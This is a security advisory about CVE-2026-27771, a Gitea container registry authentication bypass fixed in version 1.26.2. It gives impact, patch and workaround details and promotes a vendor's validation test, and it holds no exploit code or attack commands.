CVE-2026-27771
Gitea Container Registry Authentication Bypass Vulnerability
Gitea contains a high-severity authentication bypass vulnerability affecting the built-in container and package registry functionality. CVE-2026-27771 allows unauthenticated remote attackers to retrieve private container images and package artifacts without valid credentials due to missing access control enforcement in OCI-backed registry requests. The vulnerability impacts self-hosted Gitea deployments prior to version 1.26.2 and is particularly dangerous for organizations storing proprietary code, internal dependencies, credentials, or build artifacts within private registries.
Technical Details
Gitea is a self-hosted Git service that includes built-in package and container registry functionality supporting formats such as Composer, npm, Maven, and OCI-compatible container images.
CVE-2026-27771 stems from a permission check failure in the handling of package source and registry requests. The vulnerable implementation fails to properly enforce authentication and authorization controls when serving private OCI-backed container artifacts.
An unauthenticated attacker can issue standard Docker or OCI pull requests directly against the registry API and retrieve container images marked as private without valid credentials, tokens, or prior access.
Successful exploitation may expose:
- Proprietary source code
- Internal build artifacts
- Secrets embedded in containers
- Infrastructure configuration data
- Private dependencies
- Software supply chain components
The vulnerability carries a CVSS score of 8.2 and represents a significant software supply chain exposure risk for organizations relying on self-hosted Gitea environments.
Stop Guessing, Start Proving
NodeZero® Proactive Security Platform — Rapid Response
A NodeZero Rapid Response test has been developed to safely validate whether this authentication bypass can be exploited in your environment. The test executes real attack techniques without causing damage, giving teams immediate clarity on exposure.
- Run the Rapid Response test: Launch from the NodeZero platform to determine whether private container images and registry artifacts can be accessed without authentication
- Patch immediately: Upgrade affected Gitea instances to version 1.26.2 or later
- Re-run the test: Confirm the vulnerability is no longer exploitable after remediation
Affected versions & patch
- Affected: Gitea versions prior to 1.26.2 using the built-in package or container registry functionality
- Patch: Upgrade to Gitea 1.26.2 or later, which introduces the missing permission checks and properly enforces private/internal package visibility restrictions
Temporary workaround
If immediate patching is not possible, enforce authentication globally by enabling in the Gitea configuration:
[service].REQUIRE_SIGNIN_VIEW=true
This setting restricts anonymous access to repository and registry content until upgrades can be completed.
Timeline
- May 20, 2026: Gitea 1.26.2 was released with the fix for the missing package/registry permission checks.
- May 21, 2026: CVE-2026-27771 was published/reserved in vulnerability tracking sources.
- May 27, 2026: Public reporting detailed the broader exposure, including claims that 30,000+ Gitea deployments may have exposed private container images.
- May 29, 2026: NodeZero Rapid Response test made available to help customers validate exploitability and remediation status.
